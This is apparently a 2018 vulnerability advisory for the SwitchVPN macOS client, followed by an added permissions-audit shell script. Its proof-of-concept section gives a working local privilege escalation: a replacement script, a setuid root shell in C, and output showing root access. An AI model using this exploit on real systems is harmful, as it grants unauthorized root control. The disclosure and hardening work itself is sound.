=======================================================================
Title: Privilege Escalation Vulnerability
Product: SwitchVPN for MacOS
Vulnerable version: 2.1012.03
CVE ID: CVE-2018-18860
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful. Our exclusive VPN Service technology is constantly being upgraded by
a dedicated team of internet security experts."

Source: https://switchvpn.net/

Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise a MacOS system with an installation of the SwitchVPN client.

Users are urged to uninstall the SwitchVPN client for MacOS until the issue
has been fixed.

Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation Vulnerability (reserved CVE-2018-18860)

After installation or an update, the installer runs the script
"fix_permissions.sh" with elevated privileges. This script changes the owner
of the application bundle to root and then makes the whole bundle, including
the main application binaries, world-writable. Additionally, the SUID bit is
set on another binary in the application folder, "compose8". A SUID root
binary that executes a world-writable binary makes it very easy for any local
user to escalate privileges to root.

The installer logic lives in the Qt resource file "switchvpn_updater.dat".
After the installation or update of SwitchVPN, the following script is run:

============================================================================================
...
switchvpn_updater.dat

mb:MacOS b$ file switchvpn_updater.dat
switchvpn_updater.dat: Qt Binary Resource file
...
if (systemInfo.kernelType === "darwin") {
    console.log("Run permissions\n");
    component.addElevatedOperation("Execute", "/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/fix_permissions.sh");
}
...
============================================================================================
mb:MacOS b$ cat fix_permissions.sh
#!/bin/sh
chown -R root /Applications/SwitchVPN/SwitchVPN.app/
chgrp -R admin /Applications/SwitchVPN/SwitchVPN.app/
chmod -R 777 /Applications/SwitchVPN/SwitchVPN.app/
chmod -R u+s /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/compose8
============================================================================================

This leads to an over-permissive application configuration:

============================================================================================
mb:MacOS b$ ls -al
total 18720
drwxrwxrwx  35 root  admin     1120 Sep 29 20:39 .
drwxrwxrwx  16 root  admin      512 Sep 29 20:39 ..
-rwxrwxrwx   1 root  admin   106224 Oct 12  2017 SwitchVPN
-rwxrwxrwx   1 root  admin  4693216 Oct 12  2017 SwitchVPN_GUI
-r-xr-xr-x   1 root  wheel  2859376 Oct 12  2017 compose
-r-xr-xr-x   1 root  wheel    29184 Oct 12  2017 compose10
-r-xr-xr-x   1 root  wheel    29184 Oct 12  2017 compose11
-r-xr-xr-x   1 root  wheel    59152 Oct 12  2017 compose3
-r-xr-xr-x   1 root  wheel    39008 Oct 12  2017 compose4
-r-xr-xr-x   1 root  wheel   587776 Oct 12  2017 compose6
-r-xr-xr-x   1 root  wheel   278848 Oct 12  2017 compose7
-r-sr-xr-x   1 root  wheel    22800 Oct 12  2017 compose8
-r-xr-xr-x   1 root  wheel    19056 Oct 12  2017 compose9
-r-xr-xr-x   1 root  wheel   132160 Oct 12  2017 composec
-r-xr-xr-x   1 root  wheel   510464 Oct 12  2017 composecn
-r-xr-xr-x   1 root  wheel     5632 Oct 12  2017 down.sh
-rwxrwxrwx   1 root  admin      245 Oct 12  2017 fix_permissions.sh
-rw-r--r--   1 root  admin       56 Sep 29 20:39 log.txt
-r-xr-xr-x   1 root  wheel    39050 Oct 12  2017 up.sh
============================================================================================

Further investigation shows that the "SwitchVPN_GUI" binary is run as root:

============================================================================================
mb:MacOS b$ ps aux | grep -i switch
root  15165   4.6  0.4  4515952  72912   ??  S     8:39PM   0:08.84 SwitchVPN_GUI
============================================================================================

Static analysis of the "SwitchVPN" binary shows that it executes the
"compose8" SUID root binary via execl(). "compose8" in turn executes the
"SwitchVPN_GUI" binary, again via execl(). Since "SwitchVPN_GUI" is
world-writable and is executed by a process running as root, an attacker can
replace its contents with arbitrary code to escalate privileges.

============================================================================================
# SwitchVPN -> compose8
...
add     rdx, [rdx+10h]
lea     rsi, aCompose8_0        ; "compose8"
lea     rcx, aSwitchvpn         ; "SwitchVPN"
xor     r9d, r9d
xor     eax, eax
mov     rdi, rbx                ; char *
mov     r8, r14
call    _execl
...
============================================================================================

============================================================================================
# compose8 -> SwitchVPN_GUI
...
lea     rsi, aCompose8WillIn    ; "Compose8 will invoke GUI app %s, %s\n"
xor     eax, eax
mov     rdx, rbx
mov     rcx, r12
call    _fprintf
cmp     r15d, 4
lea     rdx, aB                 ; "-b"
cmovnz  rdx, r14
xor     ecx, ecx
xor     eax, eax
mov     rdi, rbx                ; char *
mov     rsi, r12                ; char *
call    _execl
...
============================================================================================

Running the "SwitchVPN" binary from the command line confirms the call chain:

============================================================================================
./SwitchVPN
This app (compose8) invoked with args: /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS, SwitchVPN
Compose8 will invoke GUI app /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/SwitchVPN_GUI, SwitchVPN_GUI
============================================================================================

Proof of concept:
-----------------
1) Privilege Escalation Vulnerability

A situation like the one described above provides a wide range of
possibilities for escalating privileges to root. A quick and easy way is to
overwrite "SwitchVPN_GUI" with the following shell script, which the SUID
root helper "compose8" will execute as root the next time the application is
started:

============================================================================================
#!/bin/bash
chown root /tmp/shell
chmod 4755 /tmp/shell
============================================================================================

Create and compile the following execve() based shell:

============================================================================================
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* /tmp/shell is SUID root once the replaced SwitchVPN_GUI has run.
       Set the real UID/GID to root as well, so /bin/sh does not drop
       the privileges it would otherwise discard when euid != ruid. */
    setuid(0);
    seteuid(0);
    setgid(0);
    char *const argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return 1; /* only reached if execve() fails */
}

gcc shell.c -o shell
============================================================================================

Copy the shell binary to an attacker controlled location (e.g. /tmp).

Start "SwitchVPN.app" as a local, unprivileged user. The SUID root helper
"compose8" executes the replaced "SwitchVPN_GUI", which makes /tmp/shell SUID
root. Executing /tmp/shell afterwards drops the user/attacker into a root
shell:

============================================================================================
-rwsr-xr-x  1 root  wheel  8576 Sep 29 20:34 shell
-rw-r--r--  1 b     wheel   127 Sep 29 20:33 shell.c

bash-3.2$ whoami
b
bash-3.2$ ./shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well.

Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via https://switchvpn.net
2018-10-10: Contacted vendor through mark@switchvpn.com
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to mark@switchvpn.com
2018-10-31: Requested status update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.

Workaround:
-----------
None.

EOF B. Leitner / @2018
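
Editor's note, added after the advisory text: the advisory gives no vendor fix and no workaround. The following POSIX shell script is an added example, not part of the advisory and not vendor code. It checks an application bundle for the two conditions that fix_permissions.sh creates, setuid/setgid files and world-writable entries, flags the combination the advisory exploits, and applies the permissions the installer script should have set instead: no write bit for group or others anywhere in the bundle, and setuid only on the single helper that needs it. The bundle path, the helper path passed to harden_bundle and the fixture layout built by make_fixture are assumptions for illustration; chown -R root is still required on a real system and is left to the caller because it needs root.

```sh
#!/bin/sh
# Added example, not from the advisory or the vendor. Audits an .app bundle
# for the two conditions fix_permissions.sh creates (setuid/setgid binaries
# next to world-writable entries) and applies the permissions that script
# should have set. Usage: sh audit_bundle.sh /path/to/App.app

# Every entry under "$1" that any user may write to (other-write bit, 002).
world_writable() {
    find "$1" -perm -002 -print 2>/dev/null | sort
}

# Every regular file under "$1" with the setuid (4000) or setgid (2000) bit.
setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print both lists. Returns 1 when the bundle contains a setuid/setgid file
# AND a world-writable entry: the combination the advisory describes, where
# the privileged helper may end up executing whatever an unprivileged user
# wrote into the writable file. Returns 0 otherwise.
audit_bundle() {
    bundle=$1
    sid=$(setid_files "$bundle")
    ww=$(world_writable "$bundle")
    [ -n "$sid" ] && printf '%s\n' "$sid" | sed 's/^/SETUID\/SETGID:  /'
    [ -n "$ww" ]  && printf '%s\n' "$ww"  | sed 's/^/WORLD-WRITABLE: /'
    if [ -n "$sid" ] && [ -n "$ww" ]; then
        printf 'VULNERABLE: setuid/setgid files coexist with world-writable entries in %s\n' "$bundle"
        return 1
    fi
    return 0
}

# What fix_permissions.sh should have done: remove the write bit for group
# and others everywhere, keep setuid only on the one helper "$2" (absolute
# path, assumed to be the only binary that legitimately needs it).
# chown -R root is still needed on a real system; it requires root and is
# left to the caller so this function also runs unprivileged.
harden_bundle() {
    bundle=$1
    suid_bin=$2
    chmod -R go-w "$bundle"
    # Strip setuid/setgid from every file except the intended helper.
    find "$bundle" -type f \( -perm -4000 -o -perm -2000 \) ! -path "$suid_bin" \
        -exec chmod ug-s {} \;
    chmod 4755 "$suid_bin"
}

# Constructed fixture imitating the advisory's bundle layout in a temp dir,
# so the functions can be exercised without touching /Applications.
make_fixture() {
    root=$(mktemp -d)
    macos="$root/SwitchVPN.app/Contents/MacOS"
    mkdir -p "$macos"
    for f in SwitchVPN SwitchVPN_GUI compose8 fix_permissions.sh; do
        printf '#!/bin/sh\n' > "$macos/$f"
    done
    chmod -R 777 "$root/SwitchVPN.app"   # what fix_permissions.sh does
    chmod 4555 "$macos/compose8"         # r-sr-xr-x, as in the advisory's listing
    printf '%s\n' "$root"
}

if [ $# -gt 0 ]; then
    audit_bundle "$1"
fi
```

On the bundle the advisory describes, audit_bundle would list compose8 as setuid and SwitchVPN, SwitchVPN_GUI, fix_permissions.sh and the directories as world-writable, and exit 1. After harden_bundle the only setuid file is the helper and nothing is writable by anyone but the owner; that still leaves compose8 a root-privileged program and does not address whatever it executes, so the audit is a check on the installer's mistake, not an assurance that the helper itself is safe.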